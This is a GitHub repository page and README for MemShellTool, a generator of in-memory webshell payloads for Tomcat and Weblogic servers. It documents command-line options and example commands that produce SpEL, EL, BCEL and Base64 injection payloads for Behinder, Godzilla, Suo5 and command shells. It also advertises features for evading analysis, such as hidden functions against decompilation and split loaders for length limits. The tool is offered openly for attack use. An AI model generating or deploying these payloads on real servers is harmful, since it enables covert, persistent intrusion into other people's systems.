https://github.com/yaoyao-cool/MemShellTool
Memory shell (in-memory webshell) generation tool: Tomcat, Weblogic, CMD, Behinder, Godzilla, Suo5......
java-memory-shell memory-shell webshell
- Host: GitHub
- URL: https://github.com/yaoyao-cool/MemShellTool
- Owner: yaoyao-cool
- Created: 2024-07-21T12:27:08.000Z (over 1 year ago)
- Default Branch: main
- Last Pushed: 2024-10-27T07:00:01.000Z (about 1 year ago)
- Last Synced: 2024-10-27T07:51:27.826Z (about 1 year ago)
- Topics: java-memory-shell, memory-shell, webshell
- Homepage:
- Size: 648 KB
- Stars: 18
- Watchers: 1
- Forks: 0
- Open Issues: 0
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - yaoyao-cool/MemShellTool - Memory shell generation tool: Tomcat, Weblogic, CMD, Behinder, Godzilla, Suo5...... (Others)
README
# MemShellTool
Memory shell payload generation tool
# 0x00
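- One-click generation of memory shell payloads
- Supports multiple types of webshells and proxy tools
- Multiple encoding methods
- Supports generating agent-based shells
- To cope with payload length limits in special environments, supports split loading through a loader
- Hides the functions in the memory shell class to resist manual decompilation analysis
- Added a GUI and a decompilation feature; the injector and webshell classes can be decompiled and displayed
- Work in progress......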
# 0x01
gui:
```
java -jar MemShellTool.jar -gui
```
Command line:
```
usage: java -jar MemShellTool.jar [-ct ] [-d] [-h] [-hn ] [-icn
] [-it ] [-k ] [-op ] [-ot ] [-p ]
[-slt ] [-sname ] [-st ] [-u ]
-ct,--containerType ContainerType: Tomcat,Weblogic...
-d,--default default option
-h,--help print this message
-hn,--headerName access shell with header
-icn,--injectClassName loader name
-it,--injectType injectType: Single,Loader,ShellCode
-k,--key shell key: GodZilla...need
-op,--outPath output path
-ot,--outTpye output type
-p,--password shell password
-slt,--shellType ServerType: CMD,Behinder...
-sname,--shellClassName shellClassName: xxxFilter
-st,--serverType ServerType: Filter,Valve,Servlet...
-u,--shellPath shell url: /shell
-------------------------
Available [InjectType]:
[SINGLE, LOADER, SHELLCODE]
-------------------------
Available [Container]:
[WEBLOGIC, TOMCAT]
-------------------------
Container [WEBLOGIC] Available ServerType:
[FILTER]
Container [TOMCAT] Available ServerType:
[FILTER, FILTER, SERVLET, VALVE, WEBSOCKET]
-------------------------
Server Type [FILTER] Available ShellType:
[BEHINDER, CMD, SUO5, GODZILLA]
Server Type [FILTER] Available ShellType:
[BEHINDER, CMD, SUO5, GODZILLA]
Server Type [SERVLET] Available ShellType:
[BEHINDER, CMD, GODZILLA]
Server Type [VALVE] Available ShellType:
[BEHINDER, CMD, GODZILLA]
Server Type [WEBSOCKET] Available ShellType:
[CMD]
-------------------------
Available OutTpye:
[RAW, BASE64, BCEL, JAVASCRIPT, SPEL, EL]
```
example:
SpEL expression, Tomcat filter, Godzilla memory shell
```
java -jar MemShellTool-v1.0.jar -d -ct TOMCAT -sname Helper -st FILTER -u /404 -slt BEHINDER -ot SPEL
spel with JsEngine:
T(javax.script.ScriptEngineManager).newInstance().getEngineByName("js").eval('var co......
spel with Spring defineClass:
T(org.springframework.cglib.core.ReflectUtils).defineClass("inje......
key value
------- -------
InjectType SINGLE
ServerType FILTER
ContainerType TOMCAT
ShellType BEHINDER
ShellClassName Helper
ShellPath /404
Password 1a1dc91c907325c6
Key key
HeaderName Accept-Header
InjectClassName inject_dc58ad
OutPath ./
OutTpye SPEL
```
SpEL injection of a Tomcat WebSocket memory shell
```
java -jar MemShellTool-v1.0.jar -d -ct TOMCAT -sname Helper -st WEBSOCKET -u /ws -slt CMD -ot SPEL
```
Inject the shell

Connect to the shell

# 0x2
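Added a fastjson memory shell, which implements memory shell functionality on top of the fastjson component.
Currently supports cmdshell and Behinder 4.0.
For the implementation principle, see: https://oh3r.vip/2025/02/05/fastjson%E5%86%85%E5%AD%98%E9%A9%AC/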

# 0x3
Decompile and display the injector and webshell classes
